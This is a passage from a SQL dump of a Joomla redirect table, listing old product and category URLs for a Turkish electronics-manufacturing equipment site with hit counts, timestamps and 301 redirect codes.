00:00:00',301),(106,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=84:neoplace&catid=51:neo&Itemid=96&lang=tr','','','',1,0,'2014-08-03 15:04:53','0000-00-00 00:00:00',301),(107,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=87:temizlik&catid=40:temizleme&Itemid=103&lang=tr','','','',1,0,'2014-08-03 15:08:49','0000-00-00 00:00:00',301),(108,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=58&Itemid=149&lang=tr','','','',3,0,'2014-08-03 15:08:49','0000-00-00 00:00:00',301),(109,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=36:orta-hizli&Itemid=37&layout=default&lang=en','','','',3,0,'2014-08-03 15:08:54','0000-00-00 00:00:00',301),(110,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=60&Itemid=164&lang=tr','','','',2,0,'2014-08-03 15:10:15','0000-00-00 00:00:00',301),(111,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=91:osai-neo&catid=1:son-haberler&Itemid=28&lang=tr','','','',3,0,'2014-08-03 15:10:18','0000-00-00 00:00:00',301),(112,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=153&Itemid=154&lang=tr','','','',1,0,'2014-08-03 15:11:40','0000-00-00 00:00:00',301),(113,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=56:rework-stasyonlari&Itemid=137&layout=default&lang=en','','','',12,0,'2014-08-03 15:18:59','0000-00-00 00:00:00',301),(114,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=75&Itemid=84&lang=tr','','','',1,0,'2014-08-03 15:21:44','0000-00-00 00:00:00',301),(115,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=113:etiket-sokucu-tidypen&catid=40:temizleme&Itemid=125&lang=en','','','',8,0,'2014-08-03 15:26:02','0000-00-00 00:00:00',301),(116,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=39&Itemid=57&lang=en','','','',1,0,'2014-08-03 15:30:23','0000-00-00 00:00:00',301),(117,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=120:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=116&lang=en','','','',3,0,'2014-08-03 15:38:48','0000-00-00 00:00:00',301),(118,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=43:ultra-hizli&Itemid=2&layout=default&lang=tr','','','',3,0,'2014-08-03 15:38:50','0000-00-00 00:00:00',301),(119,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=95&Itemid=106&lang=tr','','','',5,0,'2014-08-03 15:39:39','0000-00-00 00:00:00',301),(120,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=136&Itemid=138&lang=en','','','',2,0,'2014-08-03 15:40:04','0000-00-00 00:00:00',301),(121,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=147:sp18p-l-screen-printer&catid=57:screen-printer&Itemid=146&lang=en','','','',4,0,'2014-08-03 15:45:46','0000-00-00 00:00:00',301),(122,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=41&Itemid=55&lang=en','','','',2,0,'2014-08-03 15:48:30','0000-00-00 00:00:00',301),(123,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=165:microcare&catid=1:son-haberler&Itemid=28&lang=tr','','','',18,0,'2014-08-03 15:48:30','0000-00-00 00:00:00',301),(124,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=110:ekonomik-flux-giderici-pro&catid=40:temizleme&Itemid=121&lang=tr','','','',6,0,'2014-08-03 15:50:26','0000-00-00 00:00:00',301),(125,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=87&Itemid=103&lang=tr','','','',28,0,'2014-08-03 15:54:14','0000-00-00 00:00:00',301),(126,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=41&Itemid=55&lang=tr','','','',1,0,'2014-08-03 15:57:19','0000-00-00 00:00:00',301),(127,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=43:ultra-hizli&Itemid=2&layout=default&lang=en','','','',14,0,'2014-08-03 15:57:41','0000-00-00 00:00:00',301),(128,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=54&Itemid=114&lang=en','','','',1,0,'2014-08-03 16:00:22','0000-00-00 00:00:00',301),(129,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=140&Itemid=142&lang=tr','','','',1,0,'2014-08-03 16:01:58','0000-00-00 00:00:00',301),(130,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=54&Itemid=114&lang=tr','','','',1,0,'2014-08-03 16:03:33','0000-00-00 00:00:00',301),(131,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=43:ultra-hizli&Itemid=2&layout=default&lang=en','','','',67,0,'2014-08-03 16:05:08','0000-00-00 00:00:00',301),(132,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=110:ekonomik-flux-giderici-pro&catid=40:temizleme&Itemid=121&lang=tr','','','',9,0,'2014-08-03 16:13:01','0000-00-00 00:00:00',301),(133,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=152&Itemid=153&lang=en','','','',13,0,'2014-08-03 16:16:14','0000-00-00 00:00:00',301),(134,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=149&Itemid=150&lang=en','','','',1,0,'2014-08-03 16:22:37','0000-00-00 00:00:00',301),(135,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=59&Itemid=155&lang=en','','','',16,0,'2014-08-03 16:22:38','0000-00-00 00:00:00',301),(136,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=112&Itemid=123&lang=tr','','','',1,0,'2014-08-03 16:29:09','0000-00-00 00:00:00',301),(137,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=85:neocut&catid=51:neo&Itemid=97&lang=en','','','',1,0,'2014-08-03 16:29:12','0000-00-00 00:00:00',301),(138,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=44:pota&Itemid=56&layout=default&lang=en','','','',8,0,'2014-08-03 16:34:13','0000-00-00 00:00:00',301),(139,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=166:lfs-1&catid=44:pota&Itemid=144','','','',9,0,'2014-08-03 16:40:24','0000-00-00 00:00:00',301),(140,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=109&Itemid=120&lang=en','','','',1,0,'2014-08-03 16:40:58','0000-00-00 00:00:00',301),(141,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=109&Itemid=120&lang=tr','','','',1,0,'2014-08-03 16:43:40','0000-00-00 00:00:00',301),(142,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=155&Itemid=81&lang=tr','','','',34,0,'2014-08-03 16:46:40','0000-00-00 00:00:00',301),(143,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=120&Itemid=116&lang=tr','','','',1,0,'2014-08-03 16:46:41','0000-00-00 00:00:00',301),(144,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=167:lr4&catid=41:smd-firin&Itemid=163&lang=en','','','',63,0,'2014-08-03 16:50:26','0000-00-00 00:00:00',301),(145,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=119:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=117&lang=en','','','',12,0,'2014-08-03 16:52:56','0000-00-00 00:00:00',301),(146,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=44&Itemid=56&lang=tr','','','',1,0,'2014-08-03 16:53:00','0000-00-00 00:00:00',301),(147,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=90&Itemid=102&lang=tr','','','',30,0,'2014-08-03 16:53:05','0000-00-00 00:00:00',301),(148,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=149&Itemid=150&lang=tr','','','',1,0,'2014-08-03 16:54:42','0000-00-00 00:00:00',301),(149,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=58:dusuk-hizli-smd-dizgi&Itemid=149&layout=default&lang=en','','','',8,0,'2014-08-03 16:57:07','0000-00-00 00:00:00',301),(150,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&layout=blog&id=1&Itemid=50&lang=tr','','','',1,0,'2014-08-03 16:59:03','0000-00-00 00:00:00',301),(151,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=112:smd-firin-temizleme-roc&catid=40:temizleme&Itemid=123&lang=en','','','',5,0,'2014-08-03 16:59:04','0000-00-00 00:00:00',301),(152,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=137:chip-max-rosh-rdy&catid=56:rework-stasyonlari&Itemid=139&lang=tr','','','',55,0,'2014-08-03 17:05:25','0000-00-00 00:00:00',301),(153,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=50&lang=en','','','',7,0,'2014-08-03 17:09:13','0000-00-00 00:00:00',301),(154,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=43&Itemid=2&lang=en','','','',33,0,'2014-08-03 17:21:38','0000-00-00 00:00:00',301),(155,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=40&Itemid=60&lang=en&limitstart=10','','','',3,0,'2014-08-03 17:29:18','0000-00-00 00:00:00',301),(156,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=83&Itemid=95&lang=en','','','',1,0,'2014-08-03 17:35:46','0000-00-00 00:00:00',301),(157,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=51&Itemid=92&lang=en','','','',2,0,'2014-08-03 17:43:38','0000-00-00 00:00:00',301),(158,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=91:osai-neo&catid=1:son-haberler&Itemid=28&lang=tr','','','',3,0,'2014-08-03 17:43:49','0000-00-00 00:00:00',301),(159,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=137:chip-max-rosh-rdy&catid=56:rework-stasyonlari&Itemid=139&lang=en','','','',1,0,'2014-08-03 17:43:50','0000-00-00 00:00:00',301),(160,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=119:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=117&lang=en','','','',13,0,'2014-08-03 17:54:03','0000-00-00 00:00:00',301),(161,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=87&Itemid=99','','','',1,0,'2014-08-03 17:55:03','0000-00-00 00:00:00',301),(162,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=150:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=151&lang=en','','','',7,0,'2014-08-03 18:00:44','0000-00-00 00:00:00',301),(163,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=43&Itemid=2&lang=tr','','','',1,0,'2014-08-03 18:00:47','0000-00-00 00:00:00',301),(164,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=150:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=151&lang=en','','','',11,0,'2014-08-03 18:02:05','0000-00-00 00:00:00',301),(165,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=80:cm101&catid=43:ultra-hizli&Itemid=87&lang=en','','','',1,0,'2014-08-03 18:03:05','0000-00-00 00:00:00',301),(166,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=95&Itemid=106&lang=tr','','','',1,0,'2014-08-03 18:04:39','0000-00-00 00:00:00',301),(167,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=145&Itemid=147&lang=tr','','','',16,0,'2014-08-03 18:06:04','0000-00-00 00:00:00',301),(168,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=93&Itemid=104&lang=en','','','',14,0,'2014-08-03 18:08:45','0000-00-00 00:00:00',301),(169,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&layout=blog&id=1&Itemid=50&lang=en','','','',1,0,'2014-08-03 18:08:47','0000-00-00 00:00:00',301),(170,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=176:jvk1&catid=60:ikinciel&Itemid=164&lang=tr','','','',4,0,'2014-08-03 18:10:27','0000-00-00 00:00:00',301),(171,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=176:jvk1&catid=60:ikinciel&Itemid=164&lang=en','','','',21,0,'2014-08-03 18:12:41','0000-00-00 00:00:00',301),(172,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=153:ls60v&catid=58:dusuk-hizli-smd-dizgi&Itemid=154&lang=en','','','',13,0,'2014-08-03 18:19:35','0000-00-00 00:00:00',301),(173,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=160&Itemid=161&lang=tr','','','',17,0,'2014-08-03 18:22:15','0000-00-00 00:00:00',301),(174,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=105&Itemid=112&lang=en','','','',33,0,'2014-08-03 18:23:44','0000-00-00 00:00:00',301),(175,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=36&Itemid=37','','','',9,0,'2014-08-03 18:25:21','0000-00-00 00:00:00',301),(176,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=141&Itemid=143&lang=tr','','','',2,0,'2014-08-03 18:26:30','0000-00-00 00:00:00',301),(177,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=125&Itemid=131&lang=tr','','','',2,0,'2014-08-03 18:27:54','0000-00-00 00:00:00',301),(178,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=57:screen-printer&Itemid=145&layout=default&lang=tr','','','',4,0,'2014-08-03 18:29:20','0000-00-00 00:00:00',301),(179,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=54&Itemid=114&lang=tr','','','',31,0,'2014-08-03 18:33:37','0000-00-00 00:00:00',301),(180,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=153&Itemid=154&lang=en','','','',2,0,'2014-08-03 18:33:37','0000-00-00 00:00:00',301),(181,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=54&Itemid=114&lang=tr','','','',2,0,'2014-08-03 18:38:01','0000-00-00 00:00:00',301),(182,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=54&Itemid=114&lang=en','','','',32,0,'2014-08-03 18:42:24','0000-00-00 00:00:00',301),(183,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=39:lehimleme&Itemid=57&layout=default&lang=tr','','','',13,0,'2014-08-03 18:50:26','0000-00-00 00:00:00',301),(184,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=159&Itemid=162&lang=en','','','',6,0,'2014-08-03 18:51:49','0000-00-00 00:00:00',301),(185,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=172:avb1&catid=60:ikinciel&Itemid=164&lang=tr','','','',3,0,'2014-08-03 19:02:47','0000-00-00 00:00:00',301),(186,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=111&Itemid=122&lang=en','','','',3,0,'2014-08-03 19:11:45','0000-00-00 00:00:00',301),(187,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=44&Itemid=56&lang=tr','','','',35,0,'2014-08-03 19:13:19','0000-00-00 00:00:00',301),(188,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=44&Itemid=56&lang=tr','','','',35,0,'2014-08-03 19:16:26','0000-00-00 00:00:00',301),(189,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=44&Itemid=56&lang=en','','','',17,0,'2014-08-03 19:24:11','0000-00-00 00:00:00',301),(190,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=158:14fsfd&catid=44:pota&Itemid=159','','','',6,0,'2014-08-03 19:30:30','0000-00-00 00:00:00',301),(191,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=110&Itemid=121&lang=en','','','',12,0,'2014-08-03 19:31:54','0000-00-00 00:00:00',301),(192,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=110&Itemid=121&lang=en','','','',30,0,'2014-08-03 19:41:31','0000-00-00 00:00:00',301),(193,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=127&Itemid=134&lang=tr','','','',25,0,'2014-08-03 19:43:49','0000-00-00 00:00:00',301),(194,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=42&Itemid=27&lang=tr','','','',32,0,'2014-08-03 19:44:06','0000-00-00 00:00:00',301),(195,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=157:spartan-8s8d&catid=44:pota&Itemid=158&lang=tr','','','',5,0,'2014-08-03 19:44:12','0000-00-00 00:00:00',301),(196,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=99&Itemid=43&lang=tr','','','',35,0,'2014-08-03 19:44:44','0000-00-00 00:00:00',301),(197,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=136&Itemid=138&lang=tr','','','',2,0,'2014-08-03 19:44:49','0000-00-00 00:00:00',301),(198,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=168:aoibilgi&catid=47:aoi&Itemid=58&lang=en','','','',63,0,'2014-08-03 19:46:38','0000-00-00 00:00:00',301),(199,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=168:aoibilgi&catid=47:aoi&Itemid=58&lang=en','','','',4,0,'2014-08-03 19:52:01','0000-00-00 00:00:00',301),(200,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=44:pota&Itemid=56&layout=default&lang=tr','','','',11,0,'2014-08-03 19:58:08','0000-00-00 00:00:00',301),(201,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=122:stencilwasher-eco&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=129&lang=tr','','','',9,0,'2014-08-03 20:01:07','0000-00-00 00:00:00',301),(202,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=164:ews-310&catid=44:pota&Itemid=160&lang=en','','','',12,0,'2014-08-03 20:10:19','0000-00-00 00:00:00',301),(203,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=149&Itemid=150','','','',4,0,'2014-08-03 20:10:29','0000-00-00 00:00:00',301),(204,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=40&Itemid=60&lang=tr','','','',15,0,'2014-08-03 20:18:43','0000-00-00 00:00:00',301),(205,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=126:e-katalog&catid=55:katalog&Itemid=133&lang=tr','','','',14,0,'2014-08-03 20:28:05','0000-00-00 00:00:00',301),(206,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=124&Itemid=130&lang=en','','','',27,0,'2014-08-03 20:30:29','0000-00-00 00:00:00',301),(207,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=126:e-katalog&catid=55:katalog&Itemid=133&lang=tr','','','',33,0,'2014-08-03 20:37:30','0000-00-00 00:00:00',301),(208,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=51&Itemid=92&lang=en','','','',2,0,'2014-08-03 20:44:47','0000-00-00 00:00:00',301),(209,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=174:rh61&catid=60:ikinciel&Itemid=164','','','',5,0,'2014-08-03 20:50:28','0000-00-00 00:00:00',301),(210,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=113&Itemid=125&lang=en','','','',33,0,'2014-08-03 20:58:31','0000-00-00 00:00:00',301),(211,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=57&Itemid=145&lang=en','','','',34,0,'2014-08-03 21:06:24','0000-00-00 00:00:00',301),(212,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=57&Itemid=145&lang=tr','','','',33,0,'2014-08-03 21:10:48','0000-00-00 00:00:00',301),(213,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=91:osai-neo&catid=1:son-haberler&Itemid=28&lang=tr','','','',87,0,'2014-08-03 21:18:54','0000-00-00 00:00:00',301),(214,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=44&Itemid=56&lang=en','','','',42,0,'2014-08-03 21:24:09','0000-00-00 00:00:00',301),(215,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=91:osai-neo&catid=1:son-haberler&Itemid=28&lang=tr','','','',3,0,'2014-08-03 21:27:01','0000-00-00 00:00:00',301),(216,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=44:pota&Itemid=56&layout=default&lang=tr','','','',16,0,'2014-08-03 21:43:48','0000-00-00 00:00:00',301),(217,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=125&Itemid=131','','','',5,0,'2014-08-03 21:50:28','0000-00-00 00:00:00',301),(218,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=87&Itemid=99&lang=en','','','',1,0,'2014-08-03 22:00:37','0000-00-00 00:00:00',301),(219,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=87&Itemid=99&lang=en','','','',1,0,'2014-08-03 22:09:11','0000-00-00 00:00:00',301),(220,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=42&Itemid=27&lang=en','','','',28,0,'2014-08-03 22:22:19','0000-00-00 00:00:00',301),(221,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=95&Itemid=106&lang=tr','','','',14,0,'2014-08-03 22:30:28','0000-00-00 00:00:00',301),(222,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=168&Itemid=58&lang=tr','','','',29,0,'2014-08-03 22:35:15','0000-00-00 00:00:00',301),(223,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=168&Itemid=58&lang=tr','','','',2,0,'2014-08-03 22:41:35','0000-00-00 00:00:00',301),(224,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=88&Itemid=100&lang=en','','','',30,0,'2014-08-03 22:49:07','0000-00-00 00:00:00',301),(225,'http://3s-technologies.com.tr/index.php?option=com_content&view=category&id=39&Itemid=57&lang=en','','','',3,0,'2014-08-03 22:49:45','0000-00-00 00:00:00',301),(226,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=120&Itemid=116','','','',4,0,'2014-08-03 22:50:29','0000-00-00 00:00:00',301),(227,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=60&Itemid=164&lang=tr','','','',26,0,'2014-08-03 22:54:23','0000-00-00 00:00:00',301),(228,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=113&Itemid=125&lang=tr','','','',1,0,'2014-08-03 22:59:45','0000-00-00 00:00:00',301),(229,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=147&Itemid=146&lang=en','','','',10,0,'2014-08-03 23:09:02','0000-00-00 00:00:00',301),(230,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=167&Itemid=163&lang=en','','','',42,0,'2014-08-03 23:11:34','0000-00-00 00:00:00',301),(231,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=94&Itemid=105','','','',4,0,'2014-08-03 23:24:16','0000-00-00 00:00:00',301),(232,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=55:katalog&Itemid=1&layout=default&lang=en','','','',71,0,'2014-08-03 23:37:09','0000-00-00 00:00:00',301),(233,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=111&Itemid=122&lang=en','','','',11,0,'2014-08-03 23:38:47','0000-00-00 00:00:00',301),(234,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=137&Itemid=139','','','',3,0,'2014-08-03 23:50:28','0000-00-00 00:00:00',301),(235,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=43&Itemid=2&lang=en','','','',44,0,'2014-08-03 23:55:33','0000-00-00 00:00:00',301),(236,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=87&Itemid=103&lang=en','','','',1,0,'2014-08-03 23:58:07','0000-00-00 00:00:00',301),(237,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=125&Itemid=131&lang=en','','','',35,0,'2014-08-03 23:58:09','0000-00-00 00:00:00',301),(238,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=40&Itemid=60&lang=en','','','',36,0,'2014-08-03 23:58:15','0000-00-00 00:00:00',301),(239,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=42&Itemid=27&lang=en','','','',33,0,'2014-08-03 23:58:22','0000-00-00 00:00:00',301),(240,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=91:osai-neo&catid=1:son-haberler&Itemid=28&lang=en','','','',12,0,'2014-08-03 23:58:24','0000-00-00 00:00:00',301),(241,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=58&Itemid=149&lang=en','','','',33,0,'2014-08-03 23:58:41','0000-00-00 00:00:00',301),(242,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=51&Itemid=92&lang=en','','','',32,0,'2014-08-03 23:58:49','0000-00-00 00:00:00',301),(243,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=126&Itemid=133&lang=en','','','',36,0,'2014-08-03 23:58:50','0000-00-00 00:00:00',301),(244,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=127&Itemid=134&lang=en','','','',37,0,'2014-08-03 23:58:53','0000-00-00 00:00:00',301),(245,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=90&Itemid=102&lang=en','','','',32,0,'2014-08-03 23:58:55','0000-00-00 00:00:00',301),(246,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&layout=blog&id=1&Itemid=28&lang=en','','','',11,0,'2014-08-03 23:58:58','0000-00-00 00:00:00',301),(247,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&layout=blog&id=1&Itemid=50&lang=en','','','',15,0,'2014-08-03 23:59:00','0000-00-00 00:00:00',301),(248,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=168&Itemid=58&lang=en','','','',35,0,'2014-08-03 23:59:01','0000-00-00 00:00:00',301),(249,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=124&Itemid=130&lang=en','','','',37,0,'2014-08-03 23:59:02','0000-00-00 00:00:00',301),(250,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=99&Itemid=43&lang=en','','','',31,0,'2014-08-03 23:59:04','0000-00-00 00:00:00',301),(251,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=88&Itemid=100&lang=en','','','',32,0,'2014-08-03 23:59:05','0000-00-00 00:00:00',301),(252,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=53&Itemid=110&lang=en','','','',33,0,'2014-08-03 23:59:08','0000-00-00 00:00:00',301),(253,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=164&Itemid=160&lang=tr','','','',31,0,'2014-08-03 23:59:14','0000-00-00 00:00:00',301),(254,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=82&Itemid=38&lang=en','','','',29,0,'2014-08-03 23:59:18','0000-00-00 00:00:00',301),(255,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=59&Itemid=155&lang=en','','','',34,0,'2014-08-03 23:59:19','0000-00-00 00:00:00',301),(256,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=41&Itemid=55&lang=en','','','',35,0,'2014-08-03 23:59:21','0000-00-00 00:00:00',301),(257,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=39&Itemid=57&lang=en','','','',31,0,'2014-08-03 23:59:23','0000-00-00 00:00:00',301),(258,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=44&Itemid=56&lang=en','','','',33,0,'2014-08-03 23:59:26','0000-00-00 00:00:00',301),(259,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=60&Itemid=164&lang=en','','','',31,0,'2014-08-03 23:59:29','0000-00-00 00:00:00',301),(260,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=49&Itemid=61&lang=en','','','',31,0,'2014-08-03 23:59:34','0000-00-00 00:00:00',301),(261,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=46&Itemid=62&lang=en','','','',33,0,'2014-08-03 23:59:35','0000-00-00 00:00:00',301),(262,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=56&Itemid=137&lang=en','','','',37,0,'2014-08-03 